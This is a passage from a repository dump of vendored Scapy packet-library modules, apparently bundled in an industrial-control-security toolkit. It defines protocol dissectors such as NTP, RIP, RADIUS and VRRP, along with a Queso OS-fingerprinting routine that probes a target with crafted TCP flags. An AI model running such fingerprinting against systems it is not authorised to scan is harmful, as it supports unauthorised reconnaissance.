bind_layers( UDP, MobileIP, dport=434) 44 | bind_layers( MobileIP, MobileIPRRQ, type=1) 45 | bind_layers( MobileIP, MobileIPRRP, type=3) 46 | bind_layers( MobileIP, MobileIPTunnelData, type=4) 47 | bind_layers( MobileIPTunnelData, IP, nexthdr=4) 48 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/mobileip.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/mobileip.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/netbios.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/netbios.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/netflow.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Cisco NetFlow protocol v1 8 | """ 9 | 10 | 11 | from scapy.fields import * 12 | from scapy.packet import * 13 | 14 | # Cisco Netflow Protocol version 1 15 | class NetflowHeader(Packet): 16 | name = "Netflow Header" 17 | fields_desc = [ ShortField("version", 1) ] 18 | 19 | class NetflowHeaderV1(Packet): 20 | name = "Netflow Header V1" 21 | fields_desc = [ ShortField("count", 0), 22 | IntField("sysUptime", 0), 23 | IntField("unixSecs", 0), 24 | IntField("unixNanoSeconds", 0) ] 25 | 26 | 27 | class NetflowRecordV1(Packet): 28 | name = "Netflow Record" 29 | fields_desc = [ IPField("ipsrc", "0.0.0.0"), 30 | IPField("ipdst", "0.0.0.0"), 31 | IPField("nexthop", "0.0.0.0"), 32 | ShortField("inputIfIndex", 0), 33 | ShortField("outpuIfIndex", 0), 34 | IntField("dpkts", 0), 35 | IntField("dbytes", 0), 36 | IntField("starttime", 0), 37 | IntField("endtime", 0), 38 | ShortField("srcport", 0), 39 | ShortField("dstport", 0), 40 | ShortField("padding", 0), 41 | ByteField("proto", 0), 42 | ByteField("tos", 0), 43 | IntField("padding1", 0), 44 | IntField("padding2", 0) ] 45 | 46 | 47 | bind_layers( NetflowHeader, NetflowHeaderV1, version=1) 48 | bind_layers( NetflowHeaderV1, NetflowRecordV1, ) 49 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/netflow.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/netflow.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/ntp.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | NTP (Network Time Protocol). 8 | """ 9 | 10 | import time 11 | from scapy.packet import * 12 | from scapy.fields import * 13 | from scapy.layers.inet import UDP 14 | 15 | 16 | # seconds between 01-01-1900 and 01-01-1970 17 | _NTP_BASETIME = 2208988800 18 | 19 | class TimeStampField(FixedPointField): 20 | def __init__(self, name, default): 21 | FixedPointField.__init__(self, name, default, 64, 32) 22 | 23 | def i2repr(self, pkt, val): 24 | if val is None: 25 | return "--" 26 | val = self.i2h(pkt,val) 27 | if val < _NTP_BASETIME: 28 | return val 29 | return time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime(val-_NTP_BASETIME)) 30 | 31 | def any2i(self, pkt, val): 32 | if type(val) is str: 33 | return int(time.mktime(time.strptime(val))) + _NTP_BASETIME + 3600 # XXX 34 | return FixedPointField.any2i(self,pkt,val) 35 | 36 | def i2m(self, pkt, val): 37 | if val is None: 38 | val = FixedPointField.any2i(self, pkt, time.time()+_NTP_BASETIME) 39 | return FixedPointField.i2m(self, pkt, val) 40 | 41 | 42 | 43 | class NTP(Packet): 44 | # RFC 1769 45 | name = "NTP" 46 | fields_desc = [ 47 | BitEnumField('leap', 0, 2, 48 | { 0: 'nowarning', 49 | 1: 'longminute', 50 | 2: 'shortminute', 51 | 3: 'notsync'}), 52 | BitField('version', 3, 3), 53 | BitEnumField('mode', 3, 3, 54 | { 0: 'reserved', 55 | 1: 'sym_active', 56 | 2: 'sym_passive', 57 | 3: 'client', 58 | 4: 'server', 59 | 5: 'broadcast', 60 | 6: 'control', 61 | 7: 'private'}), 62 | BitField('stratum', 2, 8), 63 | BitField('poll', 0xa, 8), ### XXX : it's a signed int 64 | BitField('precision', 0, 8), ### XXX : it's a signed int 65 | FixedPointField('delay', 0, size=32, frac_bits=16), 66 | FixedPointField('dispersion', 0, size=32, frac_bits=16), 67 | IPField('id', "127.0.0.1"), 68 | TimeStampField('ref', 0), 69 | TimeStampField('orig', None), # None means current time 70 | TimeStampField('recv', 0), 71 | TimeStampField('sent', None) 72 | ] 73 | def mysummary(self): 74 | return self.sprintf("NTP v%ir,NTP.version%, %NTP.mode%") 75 | 76 | 77 | bind_layers( UDP, NTP, dport=123, sport=123) 78 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/ntp.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/ntp.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/pflog.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | PFLog: OpenBSD PF packet filter logging. 8 | """ 9 | 10 | from scapy.packet import * 11 | from scapy.fields import * 12 | from scapy.layers.inet import IP 13 | if conf.ipv6_enabled: 14 | from scapy.layers.inet6 import IPv6 15 | from scapy.config import conf 16 | 17 | class PFLog(Packet): 18 | name = "PFLog" 19 | # from OpenBSD src/sys/net/pfvar.h and src/sys/net/if_pflog.h 20 | fields_desc = [ ByteField("hdrlen", 0), 21 | ByteEnumField("addrfamily", 2, {socket.AF_INET: "IPv4", 22 | socket.AF_INET6: "IPv6"}), 23 | ByteEnumField("action", 1, {0: "pass", 1: "drop", 24 | 2: "scrub", 3: "no-scrub", 25 | 4: "nat", 5: "no-nat", 26 | 6: "binat", 7: "no-binat", 27 | 8: "rdr", 9: "no-rdr", 28 | 10: "syn-proxy-drop" }), 29 | ByteEnumField("reason", 0, {0: "match", 1: "bad-offset", 30 | 2: "fragment", 3: "short", 31 | 4: "normalize", 5: "memory", 32 | 6: "bad-timestamp", 33 | 7: "congestion", 34 | 8: "ip-options", 35 | 9: "proto-cksum", 36 | 10: "state-mismatch", 37 | 11: "state-insert", 38 | 12: "state-limit", 39 | 13: "src-limit", 40 | 14: "syn-proxy" }), 41 | StrFixedLenField("iface", "", 16), 42 | StrFixedLenField("ruleset", "", 16), 43 | SignedIntField("rulenumber", 0), 44 | SignedIntField("subrulenumber", 0), 45 | SignedIntField("uid", 0), 46 | IntField("pid", 0), 47 | SignedIntField("ruleuid", 0), 48 | IntField("rulepid", 0), 49 | ByteEnumField("direction", 255, {0: "inout", 1: "in", 50 | 2:"out", 255: "unknown"}), 51 | StrFixedLenField("pad", "\x00\x00\x00", 3 ) ] 52 | def mysummary(self): 53 | return self.sprintf("%PFLog.addrfamily% %PFLog.action% on %PFLog.iface% by rule %PFLog.rulenumber%") 54 | 55 | bind_layers(PFLog, IP, addrfamily=socket.AF_INET) 56 | if conf.ipv6_enabled: 57 | bind_layers(PFLog, IPv6, addrfamily=socket.AF_INET6) 58 | 59 | conf.l2types.register(117, PFLog) 60 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/ppp.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/ppp.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/radius.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | RADIUS (Remote Authentication Dial In User Service) 8 | """ 9 | 10 | import struct 11 | from scapy.packet import * 12 | from scapy.fields import * 13 | 14 | class Radius(Packet): 15 | name = "Radius" 16 | fields_desc = [ ByteEnumField("code", 1, {1: "Access-Request", 17 | 2: "Access-Accept", 18 | 3: "Access-Reject", 19 | 4: "Accounting-Request", 20 | 5: "Accounting-Accept", 21 | 6: "Accounting-Status", 22 | 7: "Password-Request", 23 | 8: "Password-Ack", 24 | 9: "Password-Reject", 25 | 10: "Accounting-Message", 26 | 11: "Access-Challenge", 27 | 12: "Status-Server", 28 | 13: "Status-Client", 29 | 21: "Resource-Free-Request", 30 | 22: "Resource-Free-Response", 31 | 23: "Resource-Query-Request", 32 | 24: "Resource-Query-Response", 33 | 25: "Alternate-Resource-Reclaim-Request", 34 | 26: "NAS-Reboot-Request", 35 | 27: "NAS-Reboot-Response", 36 | 29: "Next-Passcode", 37 | 30: "New-Pin", 38 | 31: "Terminate-Session", 39 | 32: "Password-Expired", 40 | 33: "Event-Request", 41 | 34: "Event-Response", 42 | 40: "Disconnect-Request", 43 | 41: "Disconnect-ACK", 44 | 42: "Disconnect-NAK", 45 | 43: "CoA-Request", 46 | 44: "CoA-ACK", 47 | 45: "CoA-NAK", 48 | 50: "IP-Address-Allocate", 49 | 51: "IP-Address-Release", 50 | 253: "Experimental-use", 51 | 254: "Reserved", 52 | 255: "Reserved"} ), 53 | ByteField("id", 0), 54 | ShortField("len", None), 55 | StrFixedLenField("authenticator","",16) ] 56 | def post_build(self, p, pay): 57 | p += pay 58 | l = self.len 59 | if l is None: 60 | l = len(p) 61 | p = p[:2]+struct.pack("!H",l)+p[4:] 62 | return p 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/radius.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/radius.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/rip.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | RIP (Routing Information Protocol). 8 | """ 9 | 10 | from scapy.packet import * 11 | from scapy.fields import * 12 | from scapy.layers.inet import UDP 13 | 14 | class RIP(Packet): 15 | name = "RIP header" 16 | fields_desc = [ 17 | ByteEnumField("cmd", 1, {1:"req", 2:"resp", 3:"traceOn", 4:"traceOff", 18 | 5:"sun", 6:"trigReq", 7:"trigResp", 8:"trigAck", 19 | 9:"updateReq", 10:"updateResp", 11:"updateAck"}), 20 | ByteField("version", 1), 21 | ShortField("null", 0), 22 | ] 23 | 24 | def guess_payload_class(self, payload): 25 | if payload[:2] == "\xff\xff": 26 | return RIPAuth 27 | else: 28 | return Packet.guess_payload_class(self, payload) 29 | 30 | class RIPEntry(RIP): 31 | name = "RIP entry" 32 | fields_desc = [ 33 | ShortEnumField("AF", 2, {2:"IP"}), 34 | ShortField("RouteTag", 0), 35 | IPField("addr", "0.0.0.0"), 36 | IPField("mask", "0.0.0.0"), 37 | IPField("nextHop", "0.0.0.0"), 38 | IntEnumField("metric", 1, {16:"Unreach"}), 39 | ] 40 | 41 | class RIPAuth(Packet): 42 | name = "RIP authentication" 43 | fields_desc = [ 44 | ShortEnumField("AF", 0xffff, {0xffff:"Auth"}), 45 | ShortEnumField("authtype", 2, {1:"md5authdata", 2:"simple", 3:"md5"}), 46 | ConditionalField(StrFixedLenField("password", None, 16), 47 | lambda pkt: pkt.authtype == 2), 48 | ConditionalField(ShortField("digestoffset", 0), 49 | lambda pkt: pkt.authtype == 3), 50 | ConditionalField(ByteField("keyid", 0), 51 | lambda pkt: pkt.authtype == 3), 52 | ConditionalField(ByteField("authdatalen", 0), 53 | lambda pkt: pkt.authtype == 3), 54 | ConditionalField(IntField("seqnum", 0), 55 | lambda pkt: pkt.authtype == 3), 56 | ConditionalField(StrFixedLenField("zeropad", None, 8), 57 | lambda pkt: pkt.authtype == 3), 58 | ConditionalField(StrLenField("authdata", None, 59 | length_from=lambda pkt: pkt.md5datalen), 60 | lambda pkt: pkt.authtype == 1) 61 | ] 62 | 63 | def pre_dissect(self, s): 64 | if s[2:4] == "\x00\x01": 65 | self.md5datalen = len(s) - 4 66 | 67 | return s 68 | 69 | 70 | bind_layers( UDP, RIP, sport=520) 71 | bind_layers( UDP, RIP, dport=520) 72 | bind_layers( RIP, RIPEntry, ) 73 | bind_layers( RIPEntry, RIPEntry, ) 74 | bind_layers( RIPAuth, RIPEntry, ) 75 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/rip.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/rip.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/rtp.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | RTP (Real-time Transport Protocol). 8 | """ 9 | 10 | from scapy.packet import * 11 | from scapy.fields import * 12 | 13 | _rtp_payload_types = { 14 | # http://www.iana.org/assignments/rtp-parameters 15 | 0: 'G.711 PCMU', 3: 'GSM', 16 | 4: 'G723', 5: 'DVI4', 17 | 6: 'DVI4', 7: 'LPC', 18 | 8: 'PCMA', 9: 'G722', 19 | 10: 'L16', 11: 'L16', 20 | 12: 'QCELP', 13: 'CN', 21 | 14: 'MPA', 15: 'G728', 22 | 16: 'DVI4', 17: 'DVI4', 23 | 18: 'G729', 25: 'CelB', 24 | 26: 'JPEG', 28: 'nv', 25 | 31: 'H261', 32: 'MPV', 26 | 33: 'MP2T', 34: 'H263' } 27 | 28 | class RTP(Packet): 29 | name="RTP" 30 | fields_desc = [ BitField('version', 2, 2), 31 | BitField('padding', 0, 1), 32 | BitField('extension', 0, 1), 33 | BitFieldLenField('numsync', None, 4, count_of='sync'), 34 | BitField('marker', 0, 1), 35 | BitEnumField('payload', 0, 7, _rtp_payload_types), 36 | ShortField('sequence', 0), 37 | IntField('timestamp', 0), 38 | IntField('sourcesync', 0), 39 | FieldListField('sync', [], IntField("id",0), count_from=lambda pkt:pkt.numsync) ] 40 | 41 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/rtp.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/rtp.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/sctp.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/sctp.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/sebek.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/sebek.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/skinny.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/skinny.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/smb.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/smb.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/snmp.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/snmp.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/tftp.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/tftp.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/vrrp.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## Copyright (C) 6WIND 5 | ## This program is published under a GPLv2 license 6 | 7 | """ 8 | VRRP (Virtual Router Redundancy Protocol). 9 | """ 10 | 11 | from scapy.packet import * 12 | from scapy.fields import * 13 | from scapy.layers.inet import IP 14 | 15 | IPPROTO_VRRP=112 16 | 17 | # RFC 3768 - Virtual Router Redundancy Protocol (VRRP) 18 | class VRRP(Packet): 19 | fields_desc = [ 20 | BitField("version" , 2, 4), 21 | BitField("type" , 1, 4), 22 | ByteField("vrid", 1), 23 | ByteField("priority", 100), 24 | FieldLenField("ipcount", None, count_of="addrlist", fmt="B"), 25 | ByteField("authtype", 0), 26 | ByteField("adv", 1), 27 | XShortField("chksum", None), 28 | FieldListField("addrlist", [], IPField("", "0.0.0.0"), 29 | count_from = lambda pkt: pkt.ipcount), 30 | IntField("auth1", 0), 31 | IntField("auth2", 0) ] 32 | 33 | def post_build(self, p, pay): 34 | if self.chksum is None: 35 | ck = checksum(p) 36 | p = p[:6]+chr(ck>>8)+chr(ck&0xff)+p[8:] 37 | return p 38 | 39 | bind_layers( IP, VRRP, proto=IPPROTO_VRRP) 40 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/vrrp.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/vrrp.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/x509.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | X.509 certificates. 8 | """ 9 | 10 | from scapy.asn1packet import * 11 | from scapy.asn1fields import * 12 | 13 | ########## 14 | ## X509 ## 15 | ########## 16 | 17 | ######[ ASN1 class ]###### 18 | 19 | class ASN1_Class_X509(ASN1_Class_UNIVERSAL): 20 | name="X509" 21 | CONT0 = 0xa0 22 | CONT1 = 0xa1 23 | CONT2 = 0xa2 24 | CONT3 = 0xa3 25 | 26 | class ASN1_X509_CONT0(ASN1_SEQUENCE): 27 | tag = ASN1_Class_X509.CONT0 28 | 29 | class ASN1_X509_CONT1(ASN1_SEQUENCE): 30 | tag = ASN1_Class_X509.CONT1 31 | 32 | class ASN1_X509_CONT2(ASN1_SEQUENCE): 33 | tag = ASN1_Class_X509.CONT2 34 | 35 | class ASN1_X509_CONT3(ASN1_SEQUENCE): 36 | tag = ASN1_Class_X509.CONT3 37 | 38 | ######[ BER codecs ]####### 39 | 40 | class BERcodec_X509_CONT0(BERcodec_SEQUENCE): 41 | tag = ASN1_Class_X509.CONT0 42 | 43 | class BERcodec_X509_CONT1(BERcodec_SEQUENCE): 44 | tag = ASN1_Class_X509.CONT1 45 | 46 | class BERcodec_X509_CONT2(BERcodec_SEQUENCE): 47 | tag = ASN1_Class_X509.CONT2 48 | 49 | class BERcodec_X509_CONT3(BERcodec_SEQUENCE): 50 | tag = ASN1_Class_X509.CONT3 51 | 52 | ######[ ASN1 fields ]###### 53 | 54 | class ASN1F_X509_CONT0(ASN1F_SEQUENCE): 55 | ASN1_tag = ASN1_Class_X509.CONT0 56 | 57 | class ASN1F_X509_CONT1(ASN1F_SEQUENCE): 58 | ASN1_tag = ASN1_Class_X509.CONT1 59 | 60 | class ASN1F_X509_CONT2(ASN1F_SEQUENCE): 61 | ASN1_tag = ASN1_Class_X509.CONT2 62 | 63 | class ASN1F_X509_CONT3(ASN1F_SEQUENCE): 64 | ASN1_tag = ASN1_Class_X509.CONT3 65 | 66 | ######[ X509 packets ]###### 67 | 68 | class X509RDN(ASN1_Packet): 69 | ASN1_codec = ASN1_Codecs.BER 70 | ASN1_root = ASN1F_SET( 71 | ASN1F_SEQUENCE( ASN1F_OID("oid","2.5.4.6"), 72 | ASN1F_PRINTABLE_STRING("value","") 73 | ) 74 | ) 75 | 76 | class X509v3Ext(ASN1_Packet): 77 | ASN1_codec = ASN1_Codecs.BER 78 | ASN1_root = ASN1F_field("val",ASN1_NULL(0)) 79 | 80 | 81 | class X509Cert(ASN1_Packet): 82 | ASN1_codec = ASN1_Codecs.BER 83 | ASN1_root = ASN1F_SEQUENCE( 84 | ASN1F_SEQUENCE( 85 | ASN1F_optionnal(ASN1F_X509_CONT0(ASN1F_INTEGER("version",3))), 86 | ASN1F_INTEGER("sn",1), 87 | ASN1F_SEQUENCE(ASN1F_OID("sign_algo","1.2.840.113549.1.1.5"), 88 | ASN1F_field("sa_value",ASN1_NULL(0))), 89 | ASN1F_SEQUENCE_OF("issuer",[],X509RDN), 90 | ASN1F_SEQUENCE(ASN1F_UTC_TIME("not_before",ZuluTime(-600)), # ten minutes ago 91 | ASN1F_UTC_TIME("not_after",ZuluTime(+86400))), # for 24h 92 | ASN1F_SEQUENCE_OF("subject",[],X509RDN), 93 | ASN1F_SEQUENCE( 94 | ASN1F_SEQUENCE(ASN1F_OID("pubkey_algo","1.2.840.113549.1.1.1"), 95 | ASN1F_field("pk_value",ASN1_NULL(0))), 96 | ASN1F_BIT_STRING("pubkey","") 97 | ), 98 | ASN1F_optionnal(ASN1F_X509_CONT3(ASN1F_SEQUENCE_OF("x509v3ext",[],X509v3Ext))), 99 | 100 | ), 101 | ASN1F_SEQUENCE(ASN1F_OID("sign_algo2","1.2.840.113549.1.1.5"), 102 | ASN1F_field("sa2_value",ASN1_NULL(0))), 103 | ASN1F_BIT_STRING("signature","") 104 | ) 105 | 106 | 107 | 108 | 109 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/layers/x509.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/layers/x509.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/main.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/main.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/modules/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Package of extension modules that have to be loaded explicitly. 8 | """ 9 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/modules/geoip.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | GeoIP: find out the geographical location of IP addresses 8 | """ 9 | 10 | from scapy.data import KnowledgeBase 11 | from scapy.config import conf 12 | 13 | conf.IPCountry_base = "GeoIPCountry4Scapy.gz" 14 | conf.countryLoc_base = "countryLoc.csv" 15 | conf.gnuplot_world = "world.dat" 16 | 17 | 18 | ########################## 19 | ## IP location database ## 20 | ########################## 21 | 22 | class IPCountryKnowledgeBase(KnowledgeBase): 23 | """ 24 | How to generate the base : 25 | db = [] 26 | for l in open("GeoIPCountryWhois.csv").readlines(): 27 | s,e,c = l.split(",")[2:5] 28 | db.append((int(s[1:-1]),int(e[1:-1]),c[1:-1])) 29 | cPickle.dump(gzip.open("xxx","w"),db) 30 | """ 31 | def lazy_init(self): 32 | self.base = load_object(self.filename) 33 | 34 | 35 | class CountryLocKnowledgeBase(KnowledgeBase): 36 | def lazy_init(self): 37 | f=open(self.filename) 38 | self.base = {} 39 | while 1: 40 | l = f.readline() 41 | if not l: 42 | break 43 | l = l.strip().split(",") 44 | if len(l) != 3: 45 | continue 46 | c,lat,long = l 47 | 48 | self.base[c] = (float(long),float(lat)) 49 | f.close() 50 | 51 | 52 | 53 | @conf.commands.register 54 | def locate_ip(ip): 55 | """Get geographic coordinates from IP using geoip database""" 56 | ip=map(int,ip.split(".")) 57 | ip = ip[3]+(ip[2]<<8L)+(ip[1]<<16L)+(ip[0]<<24L) 58 | 59 | cloc = country_loc_kdb.get_base() 60 | db = IP_country_kdb.get_base() 61 | 62 | d=0 63 | f=len(db)-1 64 | while (f-d) > 1: 65 | guess = (d+f)/2 66 | if ip > db[guess][0]: 67 | d = guess 68 | else: 69 | f = guess 70 | s,e,c = db[guess] 71 | if s <= ip and ip <= e: 72 | return cloc.get(c,None) 73 | 74 | 75 | 76 | 77 | 78 | conf.IP_country_kdb = IPCountryKnowledgeBase(conf.IPCountry_base) 79 | conf.country_loc_kdb = CountryLocKnowledgeBase(conf.countryLoc_base) 80 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/modules/queso.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Clone of queso OS fingerprinting 8 | """ 9 | 10 | from scapy.data import KnowledgeBase 11 | from scapy.config import conf 12 | from scapy.layers.inet import IP,TCP 13 | #from 14 | 15 | conf.queso_base ="/etc/queso.conf" 16 | 17 | 18 | ################# 19 | ## Queso stuff ## 20 | ################# 21 | 22 | 23 | def quesoTCPflags(flags): 24 | if flags == "-": 25 | return "-" 26 | flv = "FSRPAUXY" 27 | v = 0 28 | for i in flags: 29 | v |= 2**flv.index(i) 30 | return "%x" % v 31 | 32 | class QuesoKnowledgeBase(KnowledgeBase): 33 | def lazy_init(self): 34 | try: 35 | f = open(self.filename) 36 | except IOError: 37 | return 38 | self.base = {} 39 | p = None 40 | try: 41 | for l in f: 42 | l = l.strip() 43 | if not l or l[0] == ';': 44 | continue 45 | if l[0] == '*': 46 | if p is not None: 47 | p[""] = name 48 | name = l[1:].strip() 49 | p = self.base 50 | continue 51 | if l[0] not in list("0123456"): 52 | continue 53 | res = l[2:].split() 54 | res[-1] = quesoTCPflags(res[-1]) 55 | res = " ".join(res) 56 | if not p.has_key(res): 57 | p[res] = {} 58 | p = p[res] 59 | if p is not None: 60 | p[""] = name 61 | except: 62 | self.base = None 63 | warning("Can't load queso base [%s]", self.filename) 64 | f.close() 65 | 66 | 67 | queso_kdb = QuesoKnowledgeBase(conf.queso_base) 68 | 69 | 70 | def queso_sig(target, dport=80, timeout=3): 71 | p = queso_kdb.get_base() 72 | ret = [] 73 | for flags in ["S", "SA", "F", "FA", "SF", "P", "SEC"]: 74 | ans, unans = sr(IP(dst=target)/TCP(dport=dport,flags=flags,seq=RandInt()), 75 | timeout=timeout, verbose=0) 76 | if len(ans) == 0: 77 | rs = "- - - -" 78 | else: 79 | s,r = ans[0] 80 | rs = "%i" % (r.seq != 0) 81 | if not r.ack: 82 | r += " 0" 83 | elif r.ack-s.seq > 666: 84 | rs += " R" % 0 85 | else: 86 | rs += " +%i" % (r.ack-s.seq) 87 | rs += " %X" % r.window 88 | rs += " %x" % r.payload.flags 89 | ret.append(rs) 90 | return ret 91 | 92 | def queso_search(sig): 93 | p = queso_kdb.get_base() 94 | sig.reverse() 95 | ret = [] 96 | try: 97 | while sig: 98 | s = sig.pop() 99 | p = p[s] 100 | if p.has_key(""): 101 | ret.append(p[""]) 102 | except KeyError: 103 | pass 104 | return ret 105 | 106 | 107 | @conf.commands.register 108 | def queso(*args,**kargs): 109 | """Queso OS fingerprinting 110 | queso(target, dport=80, timeout=3)""" 111 | return queso_search(queso_sig(*args, **kargs)) 112 | 113 | 114 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/packet.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/packet.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/pipetool.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/pipetool.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/plist.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/plist.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/route.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/route.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/route6.pyc: -------------------------------------------------------------------------------- 